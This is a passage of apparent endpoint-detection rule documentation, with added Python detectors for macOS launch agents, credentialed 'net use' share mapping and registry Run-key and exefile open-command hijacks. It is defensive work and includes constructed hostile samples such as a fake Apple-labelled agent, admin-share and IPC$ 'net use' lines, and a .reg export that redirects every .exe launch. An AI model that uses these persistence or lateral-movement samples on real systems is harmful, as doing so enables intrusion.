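# Locations a persistent agent has no good reason to run from (assumption).
SCRATCH_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def hidden_component(path: str) -> bool:
    """True if any path element is dot-prefixed (hidden from Finder and plain ls)."""
    return any(part.startswith(".") for part in path.split("/") if part)


def inspect_launch_item(plist_path: str, plist_bytes: bytes) -> List[str]:
    """Return the indicators raised by a launchd job plist at plist_path."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or []
    program = job.get("Program") or (args[0] if args else "")
    autorun = bool(job.get("RunAtLoad")) or bool(job.get("KeepAlive"))
    tags = []
    if hidden_component(plist_path) and autorun:
        tags.append("hidden plist and autorun")
    if hidden_component(program):
        tags.append("program is in a hidden location")
    if program.startswith(SCRATCH_DIRS):
        tags.append("program is in a temporary or shared directory")
    if "/Library/Preferences/" in plist_path:
        tags.append("library preferences directory")
    return tags


# Constructed: a dot-prefixed agent whose label imitates Apple and whose
# program lives in a hidden directory under the user's home.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key><array><string>/Users/alice/.cache/.update</string><string>--quiet</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""
SUSPICIOUS_PATH = "/Users/alice/Library/LaunchAgents/.com.apple.softwareupdate.helper.plist"

# Constructed benign counterpart: visible plist, program inside an app bundle.
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.vendor.agent",
    "Program": "/Applications/Vendor.app/Contents/MacOS/agent",
    "RunAtLoad": True,
})
BENIGN_PATH = "/Library/LaunchAgents/com.vendor.agent.plist"

if __name__ == "__main__":
    print(inspect_launch_item(SUSPICIOUS_PATH, SUSPICIOUS_PLIST))
    print(inspect_launch_item(BENIGN_PATH, BENIGN_PLIST))
```

The Label value is deliberately not trusted here: an attacker picks it, so a com.apple.* label says nothing about who wrote the job.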
Lists Anti-Spyware Products (lists_anti-spyware_products): Listing anti-spyware products can be an indication of someone enumerating the security software on the system to discover potential attack vectors, which can then be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = lists anti-spyware products
Lists Antivirus Products (lists_antivirus_products): Listing antivirus products can be an indication of someone enumerating the security software on the system to discover potential attack vectors, which can then be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = lists antivirus products
Lists Firewall Products (lists_firewall_products): Listing firewall products can be an indication of someone enumerating the security software on the system to discover potential attack vectors, which can then be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = lists firewall products
Login Bypass Configured (login_bypass_configured): Accessibility features (such as Sticky Keys or the on-screen keyboard) can be launched with a key combination before a user has logged in. A login bypass can be an indicator of someone modifying the way these programs are launched in order to maintain a persistent presence on the system, escalate privileges, and create a backdoor that works without logging in.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = login bypass configured
LUA Disabled (lua_disabled): With this setting disabled, Windows User Account Control (UAC) will not notify the user when programs try to make changes to the computer. UAC was formerly known as Limited User Account (LUA), and the policy value is still named EnableLUA. Disabling it can be an attempt to bypass UAC.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = lua disabled
Mac Firewall Disabled (mac_firewall_disabled): Disabling the firewall can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.
Malicious File By Reputation Service (malicious_file_by_reputation_service): A file has executed whose hash is tagged as malicious by the reputation service.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = malicious file by reputation service
Maps Administrative Share (maps_administrative_share): Mapping an administrative share can be an indicator of someone attempting lateral movement or privilege escalation by using hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions.
Maps IPC$ Share (maps_ipc$_share): Mapping the IPC$ share can be an indicator of someone attempting lateral movement or privilege escalation by using the hidden IPC$ share, which is accessible only to administrators and provides the ability for remote file copy and other administrative functions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = maps ipc$ share
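Lateral Movement With Credentials Using Net Utility, Maps Administrative Share and Maps IPC$ Share all key off the same command line: net use with a UNC target and, optionally, a password and /user: switch. The following added example (not NetWitness code) parses constructed net use command lines and returns the rule names that apply; the tokenising and the exact conditions are my assumptions. The last sample shows a limitation worth knowing: when the command line seen is cmd.exe's, the net use string belongs to the child net.exe event, which is what the parent/child rules elsewhere in this table are for.

```python
"""Credentialed 'net use' and hidden-share mapping from a process command line.
Added example over constructed command lines; parsing and conditions are mine,
not the product's rule definitions."""
import re
from typing import Dict, List

TOKEN = re.compile(r'"[^"]*"|\S+')                 # quoted strings stay whole
UNC = re.compile(r"^\\\\[^\\]+\\([^\\]+)", re.I)   # \\host\share -> share
NET_IMAGES = {"net", "net.exe", "net1", "net1.exe"}


def net_use_indicators(cmdline: str) -> List[str]:
    toks = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if len(toks) < 2:
        return []
    exe = toks[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in NET_IMAGES or toks[1].lower() != "use":
        return []
    args = toks[2:]
    shares = [UNC.match(t).group(1) for t in args if UNC.match(t)]
    switches = [t for t in args if t.startswith("/")]
    # Anything left over that is not a switch, a UNC path or a drive letter is
    # a password (or '*' asking for a prompt, or "" for a null session).
    positional = [t for t in args
                  if not t.startswith("/") and not UNC.match(t)
                  and not re.fullmatch(r"[a-z]:", t, re.I)]
    hits = []
    if any(s.lower().startswith(("/user:", "/u:")) for s in switches) or positional:
        hits.append("lateral movement with credentials using net utility")
    if any(s.upper() == "IPC$" for s in shares):
        hits.append("maps ipc$ share")
    if any(s.endswith("$") and s.upper() != "IPC$" for s in shares):
        hits.append("maps administrative share")
    return hits


# Constructed samples with the indicators each should raise.
SAMPLES: Dict[str, List[str]] = {
    r'net use \\FILESRV01\C$ /user:CORP\svc_backup P@ssw0rd!':
        ["lateral movement with credentials using net utility", "maps administrative share"],
    r'C:\Windows\System32\net1.exe use \\10.0.0.5\IPC$ "" /user:""':
        ["lateral movement with credentials using net utility", "maps ipc$ share"],
    r'net use Z: \\fileserver\projects /persistent:no': [],
    r'net use \\DC01\ADMIN$': ["maps administrative share"],
    r'cmd.exe /c net use \\x\y /user:a b': [],   # parent's command line, not net's
}

if __name__ == "__main__":
    for cmd, expected in SAMPLES.items():
        print(f"{cmd!r}\n    -> {net_use_indicators(cmd)}")
```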
Misleading File Extension (misleading_file_extension): A file whose extension misrepresents its real type (for example, an executable named to look like a document) can be an indication of someone disguising a file as an authorized type in order to gain access or greater privileges than authorized.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = misleading file extension
Modifies Registry Using Command-Line Registry Tool (modifies_registry_using_command-line_registry_tool): Modifying the registry using the command-line registry tool (reg.exe) can be an indication of adversaries interacting with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = modifies registry using command-line registry tool
Modifies Run Key (modifies_run_key): Modifying a Run key can be an indication of someone using startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = modifies run key
Modifies Shell-Open-Command File Association (modifies_shell-open-command_file_association): File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access. Modifying a shell\open\command file association can be an attempt to execute arbitrary commands in order to maintain persistence and remain undetected.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = modifies shell-open-command file association
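The three registry rules above (Modifies Registry Using Command-Line Registry Tool, Modifies Run Key, Modifies Shell-Open-Command File Association) are easiest to understand against a concrete registry export. The following added example, which is not NetWitness code, parses a constructed .reg export, reports every Run-key value and every shell\open\command handler that points somewhere a user can write, and recognises the reg add command line that would create such a value. The export text, the user-writable heuristic and the reg.exe pattern are assumptions.

```python
"""Registry persistence checks over a constructed .reg export. Added example;
the export, the 'user-writable' heuristic and the reg.exe pattern are
assumptions, not NetWitness rule logic."""
import re
from typing import Dict, List, Optional, Tuple


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for 'Windows Registry Editor Version 5.00' exports.

    Returns {key path: {value name: data}} for string (REG_SZ) values only;
    hex:/dword: data is skipped because the checks below only need commands.
    """
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and "=" in line and line.endswith('"'):
            name, _, data = line.partition("=")
            if not data.startswith('"'):
                continue
            name = "(Default)" if name == "@" else name.strip('"')
            keys[current][name] = re.sub(r"\\(.)", r"\1", data[1:-1])  # \\ -> \ and \" -> "
    return keys


def first_executable(command: str) -> str:
    """The program a shell command line launches: first quoted or bare token."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', command)
    return (m.group(1) or m.group(2)) if m else ""


USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\appdata\\|[a-z]:\\users\\public\\|[a-z]:\\[^\\]+$|.*\\temp\\)",
    re.I)
RUN_KEY = re.compile(r"\\currentversion\\run(?:once)?$", re.I)
OPEN_CMD = re.compile(r"\\shell\\open\\command$", re.I)


def findings(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str, str, bool]]:
    """(rule, key, value name, executable, executable is in a user-writable place)."""
    out = []
    for key, values in keys.items():
        if RUN_KEY.search(key):
            for name, cmd in values.items():
                exe = first_executable(cmd)
                out.append(("modifies run key", key, name, exe, bool(USER_WRITABLE.match(exe))))
        elif OPEN_CMD.search(key):
            exe = first_executable(values.get("(Default)", ""))
            # exefile's handler must be the launched file itself ("%1"); anything
            # else routes every .exe launch through the attacker's program first.
            hijacked = key.lower().startswith("hkey_classes_root\\exefile") and exe != "%1"
            writable = bool(USER_WRITABLE.match(exe))
            if hijacked or writable:
                out.append(("modifies shell-open-command file association",
                            key, "(Default)", exe, writable))
    return out


REG_ADD = re.compile(r'^(?:"?[^"\s]*\\)?reg(?:\.exe)?"?\s+add\s+"?(?P<key>[^"\s]+)"?', re.I)


def reg_add_target(cmdline: str) -> Optional[str]:
    """Key path that a 'reg add' command line writes to, or None."""
    m = REG_ADD.match(cmdline.strip())
    return m.group("key") if m else None


# Constructed export: one benign and one suspicious Run value, one benign
# handler (txtfile) and one hijacked handler (exefile).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="C:\\Users\\alice\\AppData\\Roaming\\svchost.exe"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\Users\\Public\\stage.exe\" \"%1\" %*"
'''

if __name__ == "__main__":
    for row in findings(parse_reg_export(SAMPLE_REG)):
        print(row)
```

Note that the legitimate OneDrive entry is also reported as user-writable, because it really does live under AppData: the Run-key rule flags the modification, and it is the signing state and behaviour of the target that separate the two entries.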
Mshta Runs Command Prompt (mshta_runs_command_prompt): Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run a command prompt.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = mshta runs command prompt
Mshta Runs Powershell (mshta_runs_powershell): Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run PowerShell.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = mshta runs powershell
Mshta Runs Scripting Engine (mshta_runs_scripting_engine): Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for Mshta to execute a scripting engine.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = mshta runs scripting engine
Mshta Writes Executable (mshta_writes_executable): Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for Mshta to write an executable.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = mshta writes executable
Network Access (network_access): A process is trying to get network access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = network access
No Antivirus Notification Disabled (no_antivirus_notification_disabled): Disabling the notification that warns when no antivirus product is present can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = no antivirus notification disabled
No Firewall Notification Disabled (no_firewall_notification_disabled): Disabling the notification that warns when no firewall is active can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = no firewall notification disabled
No UAC Notification Disabled (no_uac_notification_disabled): Disabling the notification that warns when UAC is turned off can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = no uac notification disabled
No Windows Update Notification Disabled (no_windows_update_notification_disabled): Disabling the notification that warns when Windows Update is turned off can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = no windows update notification disabled
Non-Microsoft Modifies Bad Certificate Warning Setting (non-microsoft_modifies_bad_certificate_warning_setting): A non-Microsoft process modifying the bad certificate warning setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies bad certificate warning setting
Non-Microsoft Modifies Firewall Policy (non-microsoft_modifies_firewall_policy): A non-Microsoft process modifying the firewall policy can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies firewall policy
Non-Microsoft Modifies Internet Zone Setting (non-microsoft_modifies_internet_zone_setting): A non-Microsoft process modifying an Internet zone setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies internet zone setting
Non-Microsoft Modifies LUA Setting (non-microsoft_modifies_lua_setting): A non-Microsoft process modifying the LUA setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies lua setting
Non-Microsoft Modifies Registry Editor Setting (non-microsoft_modifies_registry_editor_setting): A non-Microsoft process modifying the registry editor setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies registry editor setting
Non-Microsoft Modifies Security Center Config (non-microsoft_modifies_security_center_config): A non-Microsoft process modifying the Security Center configuration can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies security center config
Non-Microsoft Modifies Services ImagePath (non-microsoft_modifies_services_imagepath): A non-Microsoft process modifying a service's ImagePath can be an indication of someone modifying an existing service to persist malware on a system, either with system utilities or with custom tools that interact with the Windows API.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies services imagepath
Non-Microsoft Modifies Task Manager Setting (non-microsoft_modifies_task_manager_setting): A non-Microsoft process modifying the Task Manager setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies task manager setting
Non-Microsoft Modifies Windows System Policy (non-microsoft_modifies_windows_system_policy): A non-Microsoft process modifying Windows system policy can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies windows system policy
Non-Microsoft Modifies Zone Crossing Warning Setting (non-microsoft_modifies_zone_crossing_warning_setting): A non-Microsoft process modifying the zone crossing warning setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies zone crossing warning setting
Office Application Crashed (office_application_crashed): Microsoft Office application crashes can happen fairly frequently, but this may be interesting in combination with other indicators involving those applications.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application crashed
Office Application Injects Remote Process (office_application_injects_remote_process): A Microsoft Office application injecting into a remote process may indicate a spearphishing attachment with a malicious payload. Process injection may enable an attacker to gain access to system resources or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application injects remote process
Office Application Runs BITS (office_application_runs_bits): A Microsoft Office application running the Background Intelligent Transfer Service (BITS) may indicate a spearphishing attachment with a malicious payload. BITS may be used to exfiltrate data outside the environment.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs bits
Office Application Runs Command Prompt (office_application_runs_command_prompt): A Microsoft Office application running the command prompt may indicate that a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs command prompt
Office Application Runs Powershell (office_application_runs_powershell): A Microsoft Office application running PowerShell may indicate that a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs powershell
Office Application Runs Scripted FTP (office_application_runs_scripted_ftp): A Microsoft Office application running scripted FTP may indicate a spearphishing attachment with a malicious payload. FTP may be used to exfiltrate data outside the environment.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs scripted ftp
Office Application Runs Scripting Engine (office_application_runs_scripting_engine): A Microsoft Office application running a scripting engine may indicate that a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs scripting engine
Office Application Runs Task Scheduler (office_application_runs_task_scheduler): A Microsoft Office application running a job or scheduling a task may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs task scheduler
Office Application Runs WMI Scripting Engine (office_application_runs_wmi_scripting_engine): A Microsoft Office application running Windows Management Instrumentation (WMI) may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs wmi scripting engine
Office Application Writes Executable (office_application_writes_executable): A Microsoft Office application writing an executable may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application writes executable
Opens Browser Process (opens_browser_process): When a file not digitally signed by Apple opens a browser process, it may indicate an adversary's attempt at process injection into the browser.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens browser process
Opens OS Process (opens_os_process): This may indicate process injection, which is a method of executing arbitrary code in the address space of a separate live process. Execution via process injection may also evade detection from security products, since the execution is masked under a legitimate process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens os process
Opens Process (opens_process): This may indicate process injection, which is a method of executing arbitrary code in the address space of a separate live process. Execution via process injection may also evade detection from security products, since the execution is masked under a legitimate process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens process
OS Process Runs Command Shell (os_process_runs_command_shell): This rule will return any filtered Windows OS process launching either 'cmd.exe' or 'powershell.exe'.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = os process runs command shell

Outbound from Unsigned AppData Directory (outbound_from_unsigned_appdata_directory)
This rule will return any unsigned filtered file name whose source is a Windows "AppData" directory and which establishes an outbound network connection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = outbound from unsigned appdata directory

Outbound from Unsigned Temporary Directory (outbound_from_unsigned_temporary_directory)
This rule will return any unsigned filtered file name whose source is a Windows "Temp" directory and which establishes an outbound network connection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = outbound from unsigned temporary directory

Outbound from Windows Directory (outbound_from_windows_directory)
This rule will return any unsigned filtered file name whose source is the Windows root directory and which establishes an outbound network connection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = outbound from windows directory

Packed (packed)
Malware may use packing applications to repackage itself frequently to evade threat detection solutions based on static signatures.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed

Packed And Autorun (packed_and_autorun)
Adversaries use software packing to compress or encrypt an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. To ensure persistence across reboots, attackers configure those executables to run on system startup.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed and autorun

Packed And Network Access (packed_and_network_access)
Adversaries use software packing to compress or encrypt an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. This file is trying to gain access to the network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed and network access

Performs Scripted File Transfer (performs_scripted_file_transfer)
Scripts may be used to transfer files over FTP during the course of an attack or for executing command and control instructions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = performs scripted file transfer

Possible Login Bypass (possible_login_bypass)
Accessibility features may be launched with a key combination before a user has logged in. Possible login bypass can be an indicator of someone trying to modify the way these programs are launched to maintain a persistent presence on the system, which can escalate privileges and create a backdoor without logging in to the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = possible login bypass

Possible Mimikatz Activity (possible_mimikatz_activity)
Mimikatz has become an extremely effective attack tool against Windows clients. Mimikatz activity can be a strong indication of someone trying to dump credentials locally or remotely using the PowerShell Mimikatz tool to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = possible mimikatz activity

Possible RDP Session Hijacking (possible_rdp_session_hijacking)
Possible RDP session hijacking can be an indication of adversaries trying to connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries may also use RDP in conjunction with the Accessibility Features technique for persistence, or perform RDP session hijacking, which involves stealing a legitimate user's remote session.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = possible rdp session hijacking

Possibly Configures UAC Bypass (possibly_configures_uac_bypass)
Configuring UAC can be an indication of a possible Windows User Account Control (UAC) bypass. Attackers can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = possibly configures uac bypass

Possibly Renamed net.exe Detected (possibly_renamed_net.exe_detected)
Presence of a renamed net.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = possibly renamed net.exe detected

Potential Outlook Exploit (potential_outlook_exploit)
This rule looks for potential Outlook exploits that would leverage 'outlook.exe' launching any suspicious 'cmd.exe', 'powershell.exe', 'wscript.exe' or 'cscript.exe'.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = potential outlook exploit

PowerShell Command Using String Manipulation (powershell_command_using_string_manipulation)
String manipulation can be used to obfuscate PowerShell commands to escape detection. These obfuscated commands can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = powershell command using string manipulation

PowerShell Double Base64 (powershell_double_base64)
This rule will return the double Base64 encoding scheme leveraged in a lot of PowerShell attacks to evade detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.4 and higher

DEPENDENCIES
* NetWitness Endpoint Server

